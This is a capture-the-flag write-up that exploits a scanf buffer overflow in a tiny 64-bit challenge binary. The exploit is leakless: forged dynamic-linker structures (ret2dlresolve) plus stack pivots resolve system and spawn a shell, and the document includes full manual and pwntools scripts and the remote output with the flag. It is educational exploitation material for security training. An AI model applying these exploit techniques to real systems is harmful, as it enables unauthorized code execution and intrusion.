BOF that's too ez

We are given a 64-bit binary called chall_patched:

Arch:       amd64-64-little
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x3fe000)
RUNPATH:    b'.'
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

We also have the Glibc library and loader. We are dealing with version 2.36:

$ ./ld-linux-x86-64.so.2 ./libc.so.6
GNU C Library (Debian GLIBC 2.36-9) stable release version 2.36.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 12.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
Minimum supported kernel: 3.2.0
For bug reporting instructions, please see:
<http://www.debian.org/Bugs/>.

Source code analysis

This time we also have the source code. And, to be honest, there is not much to say about it:

// gcc main.c -fno-stack-protector -fno-pic -no-pie -o chall
#include <stdio.h>

__attribute__( ( constructor ) ) void init() {
  setvbuf( stdin, NULL, _IONBF, NULL );
  setvbuf( stdout, NULL, _IONBF, NULL );
  setvbuf( stderr, NULL, _IONBF, NULL );
}

int main( void ) {
  char buf[0x10] = { 0 };
  scanf( "%s", buf );
  return 0;
}

So, we have a clear Buffer Overflow vulnerability: buf has only 16 bytes reserved, but scanf("%s", buf) does not check bounds and simply keeps writing until it finds a whitespace character (such as a space or a newline).
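
To make the overflow concrete, here is a minimal sketch of the payload shape. It assumes the usual frame layout for this build (the 16-byte buf sits directly below the saved $rbp, with no canary in between); the helper name build_overflow is illustrative and not part of the original exploit.

```python
import struct

BUF_SIZE = 0x10        # char buf[0x10]
SAVED_RBP_SIZE = 8     # saved frame pointer right after buf (assumed layout)


def build_overflow(return_addr: int) -> bytes:
    """Pad up to the saved return address and overwrite it (little-endian)."""
    padding = b"A" * (BUF_SIZE + SAVED_RBP_SIZE)
    return padding + struct.pack("<Q", return_addr)


# 0x4011bb is the address of main in this binary; any code address would do.
payload = build_overflow(0x4011BB)
print(len(payload), payload[-8:].hex())
```

The 24 bytes of padding are the same b'A' * 24 that the exploit stages use later on.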

Exploitation

So, Buffer Overflow. Easy, right? Not quite, because we have plenty of limitations. For instance, we would like to use Return-Oriented Programming (ROP) because NX prevents us from executing shellcode on the stack. However, we have only a few usable ROP gadgets:

$ ROPgadget --binary chall_patched
Gadgets information
============================================================
0x00000000004010cb : add bh, bh ; loopne 0x401135 ; nop ; ret
0x000000000040109c : add byte ptr [rax], al ; add byte ptr [rax], al ; endbr64 ; ret
0x0000000000401035 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401020
0x00000000004011ee : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret
0x00000000004011ef : add byte ptr [rax], al ; add cl, cl ; ret
0x000000000040113a : add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x000000000040109e : add byte ptr [rax], al ; endbr64 ; ret
0x0000000000401037 : add byte ptr [rax], al ; jmp 0x401020
0x00000000004011f0 : add byte ptr [rax], al ; leave ; ret
0x000000000040100d : add byte ptr [rax], al ; test rax, rax ; je 0x401016 ; call rax
0x000000000040113b : add byte ptr [rcx], al ; pop rbp ; ret
0x00000000004011f1 : add cl, cl ; ret
0x00000000004010ca : add dil, dil ; loopne 0x401135 ; nop ; ret
0x0000000000401045 : add dword ptr [rax], eax ; add byte ptr [rax], al ; jmp 0x401020
0x000000000040113c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401137 : add eax, 0x2f0b ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401017 : add esp, 8 ; ret
0x0000000000401016 : add rsp, 8 ; ret
0x00000000004010c8 : and byte ptr [rax + 0x40], al ; add bh, bh ; loopne 0x401135 ; nop ; ret
0x00000000004011b7 : call qword ptr [rax + 0xff3c35d]
0x0000000000401014 : call rax
0x0000000000401153 : cli ; jmp 0x4010e0
0x0000000000401033 : cli ; push 0 ; jmp 0x401020
0x0000000000401043 : cli ; push 1 ; jmp 0x401020
0x00000000004010a3 : cli ; ret
0x00000000004011f7 : cli ; sub rsp, 8 ; add rsp, 8 ; ret
0x0000000000401150 : endbr64 ; jmp 0x4010e0
0x0000000000401030 : endbr64 ; push 0 ; jmp 0x401020
0x0000000000401040 : endbr64 ; push 1 ; jmp 0x401020
0x00000000004010a0 : endbr64 ; ret
0x0000000000401012 : je 0x401016 ; call rax
0x00000000004010c5 : je 0x4010d0 ; mov edi, 0x404020 ; jmp rax
0x0000000000401107 : je 0x401110 ; mov edi, 0x404020 ; jmp rax
0x0000000000401039 : jmp 0x401020
0x0000000000401154 : jmp 0x4010e0
0x000000000040103d : jmp qword ptr [rsi - 0x70]
0x00000000004010cc : jmp rax
0x00000000004011f2 : leave ; ret
0x00000000004010cd : loopne 0x401135 ; nop ; ret
0x0000000000401136 : mov byte ptr [rip + 0x2f0b], 1 ; pop rbp ; ret
0x00000000004011ed : mov eax, 0 ; leave ; ret
0x00000000004010c7 : mov edi, 0x404020 ; jmp rax
0x00000000004011b8 : nop ; pop rbp ; ret
0x00000000004010cf : nop ; ret
0x000000000040114c : nop dword ptr [rax] ; endbr64 ; jmp 0x4010e0
0x00000000004010c6 : or dword ptr [rdi + 0x404020], edi ; jmp rax
0x0000000000401138 : or ebp, dword ptr [rdi] ; add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x000000000040113d : pop rbp ; ret
0x0000000000401034 : push 0 ; jmp 0x401020
0x0000000000401044 : push 1 ; jmp 0x401020
0x000000000040101a : ret
0x0000000000401161 : retf
0x0000000000401022 : retf 0x2f
0x0000000000401011 : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x000000000040100b : shr dword ptr [rdi], 1 ; add byte ptr [rax], al ; test rax, rax ; je 0x401016 ; call rax
0x00000000004011f9 : sub esp, 8 ; add rsp, 8 ; ret
0x00000000004011f8 : sub rsp, 8 ; add rsp, 8 ; ret
0x0000000000401010 : test eax, eax ; je 0x401016 ; call rax
0x00000000004010c3 : test eax, eax ; je 0x4010d0 ; mov edi, 0x404020 ; jmp rax
0x0000000000401105 : test eax, eax ; je 0x401110 ; mov edi, 0x404020 ; jmp rax
0x000000000040100f : test rax, rax ; je 0x401016 ; call rax

Unique gadgets found: 61

ROP gadgets

I’ll highlight those that can be useful:

0x000000000040113c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401039 : jmp 0x401020
0x00000000004011f2 : leave ; ret
0x00000000004010c7 : mov edi, 0x404020 ; jmp rax
0x000000000040113d : pop rbp ; ret
0x000000000040101a : ret

See? We don’t have the classic pop rdi; ret gadget. We can’t even choose the content of $rdi: the only gadget that sets it forces 0x404020!

Also notice that we can only set arbitrary values in $rbp. Well, we can also control $rsp because the leave instruction is just mov rsp, rbp; pop rbp.
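
The effect of leave; ret on the registers can be sketched with a tiny emulation. This is only an illustration: memory is modelled as a dictionary of 8-byte slots, and the fake frame at 0x404050 and the initial $rsp value are hypothetical.

```python
def leave_ret(regs: dict, memory: dict) -> None:
    """Emulate `leave; ret` on 8-byte stack slots stored in a dict."""
    regs["rsp"] = regs["rbp"]            # leave, part 1: mov rsp, rbp
    regs["rbp"] = memory[regs["rsp"]]    # leave, part 2: pop rbp
    regs["rsp"] += 8
    regs["rip"] = memory[regs["rsp"]]    # ret: pop the next return address
    regs["rsp"] += 8


# Hypothetical fake frame: [saved rbp][return address]
memory = {0x404050: 0x0, 0x404058: 0x40113D}
regs = {"rbp": 0x404050, "rsp": 0x7FFFFFFFE000, "rip": 0x4011F2}

leave_ret(regs, memory)
print({name: hex(value) for name, value in regs.items()})
```

Whoever controls $rbp before a leave; ret therefore decides where $rsp lands and which address is executed next.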

Hence, the first gadget could be really useful if we could control $rbx, because we would get a kind of write-what-where primitive. But it looks hard to control $rbx.

Looking at the assembly code, I found some other instructions that can be really handy:

00000000004011bb <main>:
  4011bb:       f3 0f 1e fa             endbr64
  ...
  4011d7:       48 8d 45 f0             lea    rax,[rbp-0x10]
  4011db:       48 89 c6                mov    rsi,rax
  4011de:       bf 04 20 40 00          mov    edi,0x402004
  4011e3:       b8 00 00 00 00          mov    eax,0x0
  4011e8:       e8 73 fe ff ff          call   401060 <_init+0x60>
  4011ed:       b8 00 00 00 00          mov    eax,0x0
  4011f2:       c9                      leave
  4011f3:       c3                      ret

With this section of main, we can control $rax, and therefore $rsi, through $rbp before calling scanf. Notice that $rax = 0 afterwards, so we don’t end up with $rax control. Also, while debugging, it looks like scanf leaves a value in $rsi that we can’t control properly, so that is useless too.

But the relevant thing is that we can control where scanf writes! That is, we write to the address $rbp - 0x10 (because of lea rax, [rbp-0x10]). But be careful, because the leave; ret at the end of main will cause a Stack Pivot to wherever $rbp points!
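
As a rough sketch of the bookkeeping this implies, the helper below (plan_write is a made-up name) derives the $rbp value needed to write at a given target, based on lea rax, [rbp-0x10], and the slots that the final leave; ret will consume.

```python
def plan_write(target: int) -> dict:
    """Return the $rbp needed so that scanf writes at `target`,
    plus the slots that the trailing `leave; ret` will read."""
    rbp = target + 0x10                      # lea rax, [rbp-0x10]
    return {
        "rbp": rbp,
        "scanf_writes_at": rbp - 0x10,
        "next_rbp_read_from": rbp,           # pop rbp (inside leave)
        "return_addr_read_from": rbp + 8,    # ret
    }


plan = plan_write(0x404040)  # e.g. writing over the stderr pointer
for name, value in plan.items():
    print(f"{name:>22}: {value:#x}")
```

In other words, the 8 bytes at offset 0x10 of the written data become the next $rbp, and the 8 bytes at offset 0x18 become the next return address.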

The init function also contains useful instructions:

0000000000401156 <init>:
  401156:       f3 0f 1e fa             endbr64
  ...
  40119a:       48 8b 05 9f 2e 00 00    mov    rax,QWORD PTR [rip+0x2e9f]        # 404040 <stderr@GLIBC_2.2.5>
  4011a1:       b9 00 00 00 00          mov    ecx,0x0
  4011a6:       ba 02 00 00 00          mov    edx,0x2
  4011ab:       be 00 00 00 00          mov    esi,0x0
  4011b0:       48 89 c7                mov    rdi,rax
  4011b3:       e8 98 fe ff ff          call   401050 <_init+0x50>
  ...

This part corresponds to setvbuf(stderr, NULL, _IONBF, NULL). We can also find the equivalent code for stdin (0x404030) and stdout (0x404020). Therefore, we can also set $rdi to the pointer stored at 0x404040, 0x404030 or 0x404020.

Last but not least, these sections will be highly relevant for the exploit I came up with:

0000000000401020 <.plt>:
  401020:       ff 35 ca 2f 00 00       push   QWORD PTR [rip+0x2fca]        # 403ff0 <_GLOBAL_OFFSET_TABLE_+0x8>
  401026:       ff 25 cc 2f 00 00       jmp    QWORD PTR [rip+0x2fcc]        # 403ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
  40102c:       0f 1f 40 00             nop    DWORD PTR [rax+0x0]
  401030:       f3 0f 1e fa             endbr64
  401034:       68 00 00 00 00          push   0x0
  401039:       e9 e2 ff ff ff          jmp    401020 <_init+0x20>
  40103e:       66 90                   xchg   ax,ax
  401040:       f3 0f 1e fa             endbr64
  401044:       68 01 00 00 00          push   0x1
  401049:       e9 d2 ff ff ff          jmp    401020 <_init+0x20>
  40104e:       66 90                   xchg   ax,ax

Disassembly of section .plt.sec:

0000000000401050 <.plt.sec>:
  401050:       f3 0f 1e fa             endbr64
  401054:       ff 25 a6 2f 00 00       jmp    QWORD PTR [rip+0x2fa6]        # 404000 <setvbuf@GLIBC_2.2.5>
  40105a:       66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]
  401060:       f3 0f 1e fa             endbr64
  401064:       ff 25 9e 2f 00 00       jmp    QWORD PTR [rip+0x2f9e]        # 404008 <__isoc99_scanf@GLIBC_2.7>
  40106a:       66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]

Also, notice that the only functions we can use are setvbuf and scanf. There is no function that prints information to stdout! Therefore, we must come up with a leakless exploit!

ret2dlresolve

Whenever there are few useful gadgets and no way to leak memory addresses to bypass ASLR, we can rely on ret2dlresolve.

This technique abuses how dynamically-linked programs resolve external function addresses at runtime. With this technique, we can tell the program to resolve the address of system, so we don’t have to care about ASLR.

There are not many resources out there that explain this attack in depth, especially for the x86_64 architecture. I’ll link some of them here:

In brief, we need to fake some structures and craft offsets and indices so that the _dl_runtime_resolve routine is able to find the function name, resolve the expected function in Glibc and write its real address where we want to.

[Figure: diagram of the lazy symbol resolution flow through .plt and .got.plt]

Source: https://syst3mfailure.io/ret2dl_resolve/

The image above shows the process of calling an external function (read, in that example):

The main function calls read at the .plt section
The .plt entry jumps to the address stored in the function's .got.plt slot
If the function is not resolved yet, that .got.plt slot holds an address back in the .plt
The program pushes the reloc_arg number and jumps to the default .plt stub
This stub pushes the link_map address and calls _dl_runtime_resolve

In this process, we can tamper with the reloc_arg number, because it is passed to _dl_runtime_resolve on the stack. We need to learn how the resolver uses it in order to come up with a successful ret2dlresolve exploit.

There are three relevant sections used by the linker to resolve addresses:

JMPREL (.rela.plt) is a table of Elf64_Rela structures (size 0x18). Each structure contains r_offset, r_info and r_addend. The first two fields are the relevant ones: r_offset holds the address where the resolved address will be written, and r_info is used to locate the corresponding Elf64_Sym structure in DYNSYM (its upper 32 bits are the symbol index and its lower 32 bits are the relocation type).
DYNSYM (.dynsym) contains a table of Elf64_Sym structures (size 0x18). The relevant field of this structure is st_name, which contains the offset of the symbol name within STRTAB.
STRTAB (.dynstr) is just a list of symbol names all together, separated by a null byte.
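
The walk through these three tables can be sketched with Python's struct module. This is a simplified model over a toy in-memory image (all TOY_ offsets and the toy contents are invented for illustration); the real resolver in Glibc performs additional checks, such as the relocation type and symbol versioning, that are left out here.

```python
import struct

# Field layouts from the ELF64 format (little-endian, no padding).
ELF64_RELA = struct.Struct("<QQq")     # r_offset, r_info, r_addend
ELF64_SYM = struct.Struct("<IBBHQQ")   # st_name, st_info, st_other, st_shndx, st_value, st_size


def lookup_symbol_name(image, jmprel, symtab, strtab, reloc_arg):
    """Follow reloc_arg -> Elf64_Rela -> Elf64_Sym -> name, as described above."""
    _r_offset, r_info, _r_addend = ELF64_RELA.unpack_from(
        image, jmprel + reloc_arg * ELF64_RELA.size)
    sym_index = r_info >> 32                       # upper 32 bits of r_info
    st_name = ELF64_SYM.unpack_from(
        image, symtab + sym_index * ELF64_SYM.size)[0]
    start = strtab + st_name
    return image[start:image.index(b"\0", start)]


# Toy image: string table, symbol table and one relocation entry.
TOY_STRTAB, TOY_SYMTAB, TOY_JMPREL = 0x00, 0x20, 0x80
names = b"\0read\0system\0"
toy = bytearray(0x100)
toy[TOY_STRTAB:TOY_STRTAB + len(names)] = names
# 0x12 = global binding, function type; symbol 0 stays as the null entry.
ELF64_SYM.pack_into(toy, TOY_SYMTAB + 1 * ELF64_SYM.size, names.index(b"read"), 0x12, 0, 0, 0, 0)
ELF64_SYM.pack_into(toy, TOY_SYMTAB + 2 * ELF64_SYM.size, names.index(b"system"), 0x12, 0, 0, 0, 0)
# Relocation 0 refers to symbol 2 with type 7 (R_X86_64_JUMP_SLOT).
ELF64_RELA.pack_into(toy, TOY_JMPREL, 0x404000, (2 << 32) | 7, 0)

image = bytes(toy)
resolved = lookup_symbol_name(image, TOY_JMPREL, TOY_SYMTAB, TOY_STRTAB, 0)
print(ELF64_RELA.size, ELF64_SYM.size, resolved)
```

None of the indices are bounds-checked in this walk, which is what lets an attacker point them at fake structures placed in writable memory.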

Implementation

Let’s jump directly into the ret2dlresolve exploit code:

align = lambda alignment, addr: addr + (- addr % alignment)

JMPREL = 0x4005e0  # .rela.plt section
SYMTAB = 0x3fe450  # .dynsym section
STRTAB = 0x3fe510  # .dynstr section

dlresolve_payload_addr = 0x404e00
symbol_name = b'system\0'

fake_strtab = dlresolve_payload_addr
fake_symtab = dlresolve_payload_addr + 0x10
fake_jmprel = dlresolve_payload_addr + 0x10 + 0x18

st_name = fake_strtab - STRTAB
st_value = 0
st_size = 0
st_info = 0
st_other = 0
st_shndx = 0

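# Elf64_Sym layout: st_name (4), st_info (1), st_other (1), st_shndx (2), st_value (8), st_size (8)
elf64_sym = p32(st_name) + p8(st_info) + p8(st_other) + p16(st_shndx) + p64(st_value) + p64(st_size)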

index = align(0x18, fake_symtab - SYMTAB) // 0x18

r_offset = setvbuf_got_addr
r_info = (index << 32) | 7

elf64_rel = p64(r_offset) + p64(r_info) + p64(0)

reloc_arg = align(0x18, fake_jmprel - JMPREL) // 0x18

dlresolve_payload  = symbol_name.ljust(0x10, b'\0')
dlresolve_payload += elf64_sym
dlresolve_payload += elf64_rel

First of all, I define the align function in order to fit structures with a 0x18-byte alignment. Then I define the relevant sections according to the binary:

$ readelf --sections chall_patched | egrep "Name|.rela.plt|.dynsym|.dynstr"
  [Nr] Name              Type             Address           Offset
  [ 6] .dynsym           DYNSYM           00000000003fe450  00000450
  [ 7] .dynstr           STRTAB           00000000003fe510  00000510
  [12] .rela.plt         RELA             00000000004005e0  000025e0

After that, I choose the address where I will store the payload and the symbol I want to resolve:

dlresolve_payload_addr = 0x404e00
symbol_name = b'system\0'

With this, I can start crafting fake structures. But let’s go to the end for a second:

dlresolve_payload  = symbol_name.ljust(0x10, b'\0')
dlresolve_payload += elf64_sym
dlresolve_payload += elf64_rel

In short, the dlresolve_payload is just a fake STRTAB, a fake DYNSYM and a fake JMPREL. This payload will be located at dlresolve_payload_addr = 0x404e00 (in the .bss section, which is writable):

fake_strtab = dlresolve_payload_addr
fake_symtab = dlresolve_payload_addr + 0x10
fake_jmprel = dlresolve_payload_addr + 0x10 + 0x18

Now, we need to find a value for reloc_arg and the attributes of the fake structures.

First of all, the fake SYMTAB section, which contains an Elf64_Sym structure:

st_name = fake_strtab - STRTAB
st_value = 0
st_size = 0
st_info = 0
st_other = 0
st_shndx = 0

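# Elf64_Sym layout: st_name (4), st_info (1), st_other (1), st_shndx (2), st_value (8), st_size (8)
elf64_sym = p32(st_name) + p8(st_info) + p8(st_other) + p16(st_shndx) + p64(st_value) + p64(st_size)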

The symbol index is computed from this address, as the distance between the legitimate and fake SYMTAB sections measured in 0x18-byte entries:

index = align(0x18, fake_symtab - SYMTAB) // 0x18

This index goes into the upper 32 bits of the r_info attribute of the fake Elf64_Rela structure, in the fake JMPREL section (the lower bits hold the relocation type, 7 for R_X86_64_JUMP_SLOT):

r_offset = setvbuf_got_addr
r_info = (index << 32) | 7

elf64_rel = p64(r_offset) + p64(r_info) + p64(0)

Finally, the reloc_arg number is computed as a distance between the legitimate and fake JMPREL sections:

reloc_arg = align(0x18, fake_jmprel - JMPREL) // 0x18
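
As a sanity check, the arithmetic can be reproduced with plain integers, using only the addresses given in this write-up. The helper entry_index is a made-up name; unlike align, it refuses to round, because a rounded index would no longer point exactly at the fake entry.

```python
ENTRY_SIZE = 0x18

JMPREL = 0x4005E0   # .rela.plt
SYMTAB = 0x3FE450   # .dynsym
STRTAB = 0x3FE510   # .dynstr

payload_addr = 0x404E00
fake_strtab = payload_addr
fake_symtab = payload_addr + 0x10
fake_jmprel = payload_addr + 0x10 + 0x18


def entry_index(table: int, fake_entry: int) -> int:
    """Index of fake_entry relative to table, in 0x18-byte entries."""
    distance = fake_entry - table
    if distance % ENTRY_SIZE:
        raise ValueError(f"{fake_entry:#x} is not entry-aligned relative to {table:#x}")
    return distance // ENTRY_SIZE


index = entry_index(SYMTAB, fake_symtab)       # 1128
reloc_arg = entry_index(JMPREL, fake_jmprel)   # 771
st_name = fake_strtab - STRTAB                 # 0x68f0
r_info = (index << 32) | 7

print(index, reloc_arg, hex(st_name), hex(r_info))
```

With dlresolve_payload_addr = 0x404e00 both distances are exact multiples of 0x18, so align does not actually round anything in this exploit.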

Did you notice that r_offset is set to the address of setvbuf at the GOT? Yes, we want the address of system to be written there. Once that happens, we can jump to the code we saw earlier in the init function, which loads $rdi with the pointer stored at 0x404020, 0x404030 or 0x404040 and then calls setvbuf (now system). Therefore, we need one of those pointers to point to "/bin/sh\0".

Here are some ROP gadget addresses and other addresses required for the exploit:

pop_rbp_ret_addr = 0x40113d
leave_ret_addr = 0x4011f2

jmp_plt_addr = 0x401039

setvbuf_got_addr = 0x404000
stderr_got_addr = 0x404040

bin_sh_addr = 0x404048

call_setvbuf_addr = 0x40119a

I don’t know how to explain this better than showing the code:

io = get_process()

stage1  = p64(pop_rbp_ret_addr)
stage1 += p64(stderr_got_addr + 0x10)
stage1 += p64(context.binary.sym.main + 28)

io.sendline(b'A' * 24 + stage1)

In this stage, we set the value of $rbp to the address of stderr (0x404040) plus 0x10. We do this because $rax will take the value of $rbp - 0x10 at *main+28 (lea rax, [rbp-0x10]). Hence, scanf will write at the address of stderr (0x404040).

stage2  = p64(pop_rbp_ret_addr)
stage2 += p64(dlresolve_payload_addr - 0x80 + 0x10)
stage2 += p64(leave_ret_addr)
stage2 += b'\0' * 0xd20
stage2 += p64(dlresolve_payload_addr - 0x80 + 0x10)
stage2 += p64(context.binary.sym.main + 28)

io.sendline(p64(bin_sh_addr) + b'/bin/sh\0' + b'\0' * 8 + stage2)

First of all, we use the 24 bytes that precede the ROP chain (the usual Buffer Overflow junk) to store the address of the string "/bin/sh\0" followed by the string itself. We need this for the end, because setvbuf will be called with the pointer stored at stderr (0x404040), which at this point is no longer the real stderr but 0x404048, the address of "/bin/sh\0".

The second stage will execute from here because at the end of main there is a leave; ret, so we are effectively performing a Stack Pivot. This means that $rsp now points to the .bss, specifically, to 0x404058. Now we do the same trick of setting $rbp to be able to write at a desired address with scanf.

We will start writing just before dlresolve_payload_addr because we need the stack to be safe when doing the ret2dlresolve stuff. We do another leave; ret to move $rsp to the current value of $rbp (which is 0x70 bytes before dlresolve_payload_addr). This is the reason for the 0xd20-byte padding:

$ python3 -q
>>> hex((0x404e00 - 0x80 + 0x10) - (0x404040 + 0x30))
'0xd20'
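
The same bookkeeping for the whole second stage can be sketched as a small address map. The constants come from this write-up; the variable names and the layout comments are my own reading of the payload.

```python
STDERR_ADDR = 0x404040
DLRESOLVE_PAYLOAD_ADDR = 0x404E00

write_base = STDERR_ADDR                  # scanf writes here ($rbp - 0x10)
bin_sh_ptr_addr = write_base              # p64(bin_sh_addr) replaces the stderr pointer
bin_sh_str_addr = write_base + 0x8        # b"/bin/sh\0"
fake_saved_rbp_addr = write_base + 0x10   # popped into $rbp by leave
chain_start = write_base + 0x18           # first address taken by ret

new_rbp = DLRESOLVE_PAYLOAD_ADDR - 0x80 + 0x10
padding_start = chain_start + 3 * 8       # after pop rbp; ret, its operand and leave; ret
padding_len = new_rbp - padding_start
stage3_write_addr = new_rbp - 0x10        # where the next scanf will write

for name, value in [
    ("bin_sh_str_addr", bin_sh_str_addr),
    ("chain_start", chain_start),
    ("new_rbp", new_rbp),
    ("padding_len", padding_len),
    ("stage3_write_addr", stage3_write_addr),
]:
    print(f"{name:>18}: {value:#x}")
```

Note that stage3_write_addr + 0x80 is exactly dlresolve_payload_addr, which is why the third stage needs 0x80 bytes in front of the fake structures.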

After the padding, we enter again the address dlresolve_payload_addr - 0x80 + 0x10 (so that leave; ret loads it into $rbp) and then the address main + 28 to call scanf again while controlling $rax and $rsi. The program flow will come back here after that scanf, so we will be able to write our third stage at this address:

stage3  = p64(jmp_plt_addr)
stage3 += p64(reloc_arg)
stage3 += p64(call_setvbuf_addr)
stage3 += b'\0' * 0x50
stage3 += dlresolve_payload

io.sendline(b'A' * 24 + stage3)

This last stage writes 0x18 bytes of Buffer Overflow junk and then the address of a jmp 0x401020 instruction. We cannot use 0x401020 directly because the byte 0x20 is the ASCII space character, and scanf would stop reading there. Next comes the reloc_arg for the ret2dlresolve exploit, which takes the place of the value a PLT entry would normally push. After that, we enter the address of the code that loads $rdi from 0x404040 (now a pointer to "/bin/sh\0") and calls setvbuf (this will happen after the relocation process).

Finally, we add some more padding to fit in 0x80 bytes (0x18 + 0x18 + 0x50) and write dlresolve_payload.
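
Since every stage goes through scanf("%s"), it can help to check payloads for whitespace bytes before sending them. Below is a minimal sketch with a hypothetical helper, scanf_unsafe_offsets, assuming the C locale's whitespace set (space, \t, \n, \v, \f, \r):

```python
import struct

# Bytes that terminate a %s conversion (isspace in the C locale).
SCANF_WHITESPACE = b" \t\n\v\f\r"


def scanf_unsafe_offsets(payload: bytes) -> list:
    """Return the offsets of bytes that would make scanf("%s") stop early."""
    return [i for i, byte in enumerate(payload) if byte in SCANF_WHITESPACE]


plt0 = struct.pack("<Q", 0x401020)          # contains the byte 0x20 (space)
jmp_to_plt0 = struct.pack("<Q", 0x401039)   # jmp 0x401020 gadget

print(scanf_unsafe_offsets(plt0))         # [0]
print(scanf_unsafe_offsets(jmp_to_plt0))  # []
```

Null bytes are not a problem for %s, which is why the stages can contain packed 64-bit addresses and zero padding.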

With all this, we will get a shell, both locally and on the local Docker container:

$ python3 solve_manual.py
[*] './chall_patched'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x3fe000)
    RUNPATH:    b'.'
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[+] Starting local process './chall_patched': pid 3272010
[*] Switching to interactive mode
$ whoami
rocky

Using pwntools

If you noticed, the script is called solve_manual.py. That’s because I wrote another exploit called solve_pwntools.py that abstracts all the ret2dlresolve stuff. Here it is:

pop_rbp_ret_addr = 0x40113d
leave_ret_addr = 0x4011f2

bin_sh_addr = 0x404048

jmp_plt_addr = 0x401039

call_setvbuf_addr = 0x40119a

dlresolve = Ret2dlresolvePayload(
    context.binary,
    symbol='system',
    args=[],
    resolution_addr=context.binary.got.setvbuf,
)

io = get_process()

stage1  = p64(pop_rbp_ret_addr)
stage1 += p64(context.binary.got.stderr + 0x10)
stage1 += p64(context.binary.sym.main + 28)

io.sendline(b'A' * 24 + stage1)

stage2  = p64(pop_rbp_ret_addr)
stage2 += p64(dlresolve.data_addr - 0x80 + 0x10)
stage2 += p64(leave_ret_addr)
stage2 += b'\0' * 0xd20
stage2 += p64(dlresolve.data_addr - 0x80 + 0x10)
stage2 += p64(context.binary.sym.main + 28)

io.sendline(p64(bin_sh_addr) + b'/bin/sh\0' + b'\0' * 8 + stage2)

stage3  = p64(jmp_plt_addr)
stage3 += p64(dlresolve.reloc_index)
stage3 += p64(call_setvbuf_addr)
stage3 += b'\0' * 0x50
stage3 += dlresolve.payload

io.sendline(b'A' * 24 + stage3)

io.interactive()

Obviously, it is not as exciting as solve_manual.py, but it does look more friendly.

Flag

With any of the exploits, we can get a shell on the remote instance and capture the flag:

$ python3 solve_manual.py 0.cloud.chals.io 26418
[*] './chall_patched'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x3fe000)
    RUNPATH:    b'.'
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[+] Opening connection to 0.cloud.chals.io on port 26418: Done
[*] Switching to interactive mode
$ cat /flag*
HackOn{th4t_w4s_4_fr33_BOF_4_y0u_6c6415857decc41b8d9366be69ab68cc}

The full exploits can be found here: solve_manual.py and solve_pwntools.py.